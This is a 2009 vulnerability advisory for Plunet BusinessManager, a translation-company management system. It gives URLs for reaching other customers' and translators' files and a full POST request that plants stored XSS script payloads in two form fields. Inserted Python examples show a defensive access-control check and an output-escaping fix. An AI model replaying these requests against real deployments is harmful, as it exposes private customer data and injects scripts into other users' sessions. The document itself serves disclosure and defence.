Plunet BusinessManager Information Disclosure / XSS

Posted Jan 7, 2009
Authored by Gabriele Zanoni, Matteo Ignaccolo | Site securenetwork.it

Plunet BusinessManager suffers from stored cross site scripting and information disclosure vulnerabilities.

tags | exploit, vulnerability, xss, info disclosure
SHA-256 | bbb6b7efc7455a72e4246a17d17484a00d7d0d57b0db5110e8853ccd42f1c704

Secure Network - Security Research Advisory

Vuln name: Failure in Access Controls; multiple Stored Cross Site Scripting vulnerabilities.
Systems affected: Plunet BusinessManager
Systems not affected:
Severity: High
Local/Remote: Remote
Vendor URL: http://www.plunet.de
Author(s): Matteo Ignaccolo m.ignaccolo@securenetwork.it - Gabriele Zanoni g.zanoni@securenetwork.it
Relates to:
Vendor disclosure: 23/09/2008
Vendor acknowledged:
Vendor patch release:
Public disclosure: 23/12/2008
Advisory number: SN-2008-04
Advisory URL: http://www.securenetwork.it/advisories/

*** SUMMARY ***

Plunet BusinessManager is a software package for translation companies that
offers, on a single platform, a solution for handling customers, translators,
document management, data, order management and processing.
Because Plunet BusinessManager performs incorrect validation of some input
form fields, Stored Cross Site Scripting attacks are possible.
Moreover, customers and translators can access data and files that are not
related to them.

*** VULNERABILITY DETAILS ***

The application fails to perform correct access control on data and files.
Any user (Customer or Translator) can retrieve and alter data and files not
related to them. In addition, a user can easily enumerate all of the
company's customers.

The application fails to validate the QUB and Bez74 parameters, so stored
Cross Site Scripting attacks are possible.


*** EXPLOIT ***

An authenticated Customer could use the following URL to access other
Customers' private areas.

http://domain/pagesUTF8/Sys_DirAnzeige.jsp?AnzeigeText=&Pfad=/Customer/<CUSTOMER-ID>

An authenticated Translator could use the following URL to access Orders not
assigned to them.

http://domain/pagesUTF8/Sys_DirAnzeige.jsp?AnzeigeText=/PRM&Pfad=/ORDER/C-00042/PRM

An authenticated Translator could use the following URL to access Jobs not
assigned to them.

http://domain/pagesUTF8/auftrag_job.jsp?OSG05=1944&anchor=AJob31944 surf jobs
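The three URLs above are all instances of the same missing authorisation check: the server serves whatever `Pfad` names, for whoever holds a valid session. The usual way to confirm such a flaw without guessing is a differential test, requesting the same resource with two sessions and flagging resources that both can read although only one should own them. The following is an added example of that check, not code from the advisory or from Plunet; the `fetch` transport, the session labels `sessA`/`sessB`, the customer ID `C-00042` and the fake server responses are all constructed for offline use, and `fake_fetch` would be replaced by a real HTTP client against an instance you are authorised to test.

```python
"""Differential access-control (IDOR) check for the Sys_DirAnzeige.jsp listing.

Added example; the URL shape comes from the advisory, everything else
(sessions, IDs, responses, the fetch callable) is a constructed stand-in.
"""
from typing import Callable, Dict, List, Tuple
from urllib.parse import parse_qs, urlencode, urlsplit

BASE = "http://domain/pagesUTF8/Sys_DirAnzeige.jsp"  # path from the advisory

Response = Tuple[int, str]                       # (HTTP status, body)
Fetcher = Callable[[str, str], Response]         # (session cookie, url) -> Response


def dir_url(path: str, anzeige: str = "") -> str:
    """Build the directory-listing URL described in the advisory.

    safe='/' keeps slashes literal so the query matches the advisory's form.
    """
    return f"{BASE}?{urlencode({'AnzeigeText': anzeige, 'Pfad': path}, safe='/')}"


def find_idor(fetch: Fetcher, owner: str, other: str,
              resources: List[Tuple[str, str]]) -> List[str]:
    """Return the paths in `resources` (owned by session `owner`) that
    session `other` can read with identical content.

    A path the owner cannot read is skipped: it says nothing about
    authorisation. A 200 for `other` with the same body is the leak signal.
    """
    leaked = []
    for path, anzeige in resources:
        url = dir_url(path, anzeige)
        st_owner, body_owner = fetch(owner, url)
        st_other, body_other = fetch(other, url)
        if st_owner != 200:
            continue
        if st_other == 200 and body_other.strip() == body_owner.strip():
            leaked.append(path)
    return leaked


# --- constructed offline stand-in for the vulnerable server -----------------
# Every path is served to any authenticated session (the advisory's behaviour),
# except /Customer/C-00099, which this fake enforces ownership on so the check
# has a negative case.
FAKE_FILES: Dict[str, str] = {
    "/Customer/C-00042": "<a>offer.pdf</a><a>invoice.pdf</a>",
    "/ORDER/C-00042/PRM": "<a>source.doc</a>",
    "/Customer/C-00099": "<a>contract.pdf</a>",
}
FAKE_OWNER = {p: "sessA" for p in FAKE_FILES}   # sessA owns all three
ENFORCED = {"/Customer/C-00099"}                # the only path with a real check


def fake_fetch(session: str, url: str) -> Response:
    """Hypothetical transport: answers from FAKE_FILES instead of the network."""
    path = parse_qs(urlsplit(url).query)["Pfad"][0]
    if path not in FAKE_FILES:
        return 404, ""
    if path in ENFORCED and FAKE_OWNER[path] != session:
        return 403, "forbidden"
    return 200, FAKE_FILES[path]


RESOURCES = [("/Customer/C-00042", ""),
             ("/ORDER/C-00042/PRM", "/PRM"),
             ("/Customer/C-00099", "")]

if __name__ == "__main__":
    for path in find_idor(fake_fetch, "sessA", "sessB", RESOURCES):
        print("readable by a non-owner:", path)
```

Against the constructed server the check reports `/Customer/C-00042` and `/ORDER/C-00042/PRM` and stays silent on `/Customer/C-00099`; comparing bodies rather than only status codes matters because some applications return 200 with an empty or error page instead of 403.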

Stored Cross Site Scripting

POST /pagesUTF8/auftrag_allgemeinauftrag.jsp HTTP/1.1
Host: <HOSTNAME> or IP
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.16) Gecko/20080718 Ubuntu/8.04 (hardy) Firefox/2.0.0.16
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Referer: http://<hostname or IP>/pagesUTF8/auftrag_allgemeinauftrag.jsp
Cookie: JSESSIONID=0B1347DFFD031E6BC1944C381A31293D
Content-Type: application/x-www-form-urlencoded
Content-Length: 1085

TokenUAID=42&QUK=1449&QUKA=*&QUKANSCH=820&QUKLIEFANSCH=820&QUZ=sample&
VorlageID=3&QU02=1-&QUL=sample&QUB=%22%3E%3Cscript%3Ealert%28%22XSS2%22%29
%3B%3C%2Fscript%3E&QUG=sample&OSPK01=141&OSPK02=0&OSSK05=&OSSK09=1&PJ12=14
&DATAUFTT=07&DATAUFMM=01&DATAUFJJJJ=2008&DATLIEFTT=24&DATLIEFMM=01&
DATLIEFJJJJ=2008&DATLIEFHH=&DATLIEFMN=&PJ13=&
Bez74=%22%3E%3Cscript%3Ealert%28%22XSS4%22%29%3B%3C%2Fscript%3E&
LDate74TT=24&LDate74MM=01&LDate74JJJJ=2008&LDate74HH=13&
LDate74MN=00&BOXP74=4&REA01774=59&REA01874=sample&
OutPE0174=0&OutPAP74=8385&Bem74=sample&REA001=&REA010=&REA007=1&REA008=2&
REA011=0&REA013=0&REA015=0&LEISTung=sample&LangFlag=&exit=&SelectTab=
&ContentBox=&OpenContentBox=&LoginPressed=false&SaveButton=true&
CheckXYZ=Send&yOffsetScroll=0
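The two payloads in that body (`QUB` and `Bez74`) close an attribute with `">` and then open a `<script>` tag, which is exactly what output encoding would neutralise. The following is an added example, not code from the advisory or from Plunet: it decodes a trimmed copy of the request body above (only the relevant fields are kept, which is a constructed sample), flags the parameters that carry markup in the way a WAF rule from the workarounds section would, and contrasts the unescaped interpolation the vulnerable page performs with an HTML-escaped one. The attribute name `value` in the rendered `<input>` is an assumption about where the field is echoed.

```python
"""Detect and neutralise the stored-XSS payloads from the advisory's request.

Added example. SAMPLE_BODY is a trimmed, constructed copy of the POST body;
the two payload values are the advisory's own.
"""
import html
import re
from urllib.parse import parse_qs

SAMPLE_BODY = (
    "TokenUAID=42&QUK=1449&QUZ=sample"
    "&QUB=%22%3E%3Cscript%3Ealert%28%22XSS2%22%29%3B%3C%2Fscript%3E"
    "&QUG=sample"
    "&Bez74=%22%3E%3Cscript%3Ealert%28%22XSS4%22%29%3B%3C%2Fscript%3E"
    "&Bem74=sample&SaveButton=true"
)

# A tag opener, or a quote followed by '>', is enough to break out of an HTML
# attribute or text node; this is the shape of a simple WAF/IPS rule.
MARKUP_RE = re.compile(r"<\s*/?\s*[a-zA-Z]|[\"']\s*>")


def parse_form(body: str) -> dict:
    """Decode an application/x-www-form-urlencoded body into {name: value}."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def flag_markup(fields: dict) -> list:
    """Names of the fields whose decoded value contains HTML markup."""
    return [name for name, value in fields.items() if MARKUP_RE.search(value)]


def render_unsafe(value: str) -> str:
    """What the vulnerable page does: the stored value lands in markup as-is."""
    return f'<input name="QUB" value="{value}">'


def render_safe(value: str) -> str:
    """The fix: escape for the HTML attribute context (quotes included)."""
    return f'<input name="QUB" value="{html.escape(value, quote=True)}">'


if __name__ == "__main__":
    fields = parse_form(SAMPLE_BODY)
    for name in flag_markup(fields):
        print(f"{name}: {fields[name]!r}")
    print(render_unsafe(fields["QUB"]))
    print(render_safe(fields["QUB"]))
```

Escaping at output time is the durable fix; the input-side pattern match is only the stop-gap the advisory's workaround section alludes to, and it will miss payloads that do not need a tag or a quote in the particular context the value is echoed into.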


*** FIX INFORMATION ***

No patch is currently available.

*** WORKAROUNDS ***

No workaround is available, but some web application firewalls and IPS can be
configured to block the requests described above.

*********************
*** LEGAL NOTICES ***
*********************

Secure Network (www.securenetwork.it) is an information security company,
which provides consulting and training services, and engages in security
research and development.

We are committed to open, full disclosure of vulnerabilities, cooperating
whenever possible with software developers for properly handling disclosure.

This advisory is copyright 2008 Secure Network S.r.l. Permission is
hereby granted for the redistribution of this alert, provided that it is
not altered except by reformatting it, and that due credit is given. It
may not be edited in any way without the express consent of Secure Network
S.r.l. Permission is explicitly given for insertion in vulnerability
databases and similars, provided that due credit is given to Secure Network.

The information in the advisory is believed to be accurate at the time of
publishing based on currently available information. This information is
provided as-is, as a free service to the community by Secure Network
research staff. There are no warranties with regard to this information.
Secure Network does not accept any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.

If you have any comments or inquiries, or any issue with what is reported
in this advisory, please inform us as soon as possible.

E-mail: securenetwork@securenetwork.it
GPG/PGP key: http://www.securenetwork.it/pgpkeys/Secure%20Network.asc
Phone: +39 02 24 12 67 88


--
Dott. Ing. Matteo Ignaccolo

Secure Network S.r.l.
Via Venezia, 23 - 20099 Sesto San Giovanni (MI) - Italia
Tel: +39 02.24126788
email: m.ignaccolo@securenetwork.it
web: www.securenetwork.it